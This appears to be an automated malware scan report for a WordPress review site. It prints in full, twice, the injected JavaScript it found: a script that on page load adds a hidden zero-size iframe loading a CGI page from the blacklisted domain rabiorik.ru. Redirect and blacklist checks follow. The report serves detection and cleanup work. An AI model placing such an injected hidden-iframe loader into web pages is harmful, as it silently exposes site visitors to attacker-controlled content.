Scanned pages/files
Request | Server response | Status |
http://www.100percentwinnersreviews.net/ | 200 OK Content-Length: 39845 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('y3yoi31');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="y3yoi31";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function ozowezk(){create_frame("http://rabiorik.ru/gvgsdvx.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',ozowezk)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();ozowezk()};window.onload=newonload}else{window.onload=ozowezk}}}catch(err){} Decoded script: function ozowezk() { create_frame("http://rabiorik.ru/gvgsdvx.cgi?default"); } | ||
http://www.100percentwinnersreviews.net/wp-includes/js/l10n.js?ver=20101110 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.100percentwinnersreviews.net/test404page.js | 404 Not Found Content-Length: 843 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('o3qt7');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="o3qt7";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function wbzltin(){create_frame("http://rabiorik.ru/swvzrhq.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',wbzltin)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();wbzltin()};window.onload=newonload}else{window.onload=wbzltin}}}catch(err){} Decoded script: function wbzltin() { create_frame("http://rabiorik.ru/swvzrhq.cgi?default"); } | ||
http://www.100percentwinnersreviews.net/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/javascript | clean |
http://www.100percentwinnersreviews.net/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.2 | 200 OK Content-Length: 927 Content-Type: application/javascript | clean |
http://www.100percentwinnersreviews.net/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 22597 Content-Type: application/javascript | clean |
http://www.100percentwinnersreviews.net/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.4 | 200 OK Content-Length: 5802 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 100percentwinnersreviews.net
Result:
GET / HTTP/1.1
Host: 100percentwinnersreviews.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 100percentwinnersreviews.net
Referer: http://www.google.com/search?q=100percentwinnersreviews.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 100percentwinnersreviews.net
Referer: http://www.google.com/search?q=100percentwinnersreviews.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=100percentwinnersreviews.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://100percentwinnersreviews.net/
Result: 100percentwinnersreviews.net is not infected or malware details are not published yet.
Result: 100percentwinnersreviews.net is not infected or malware details are not published yet.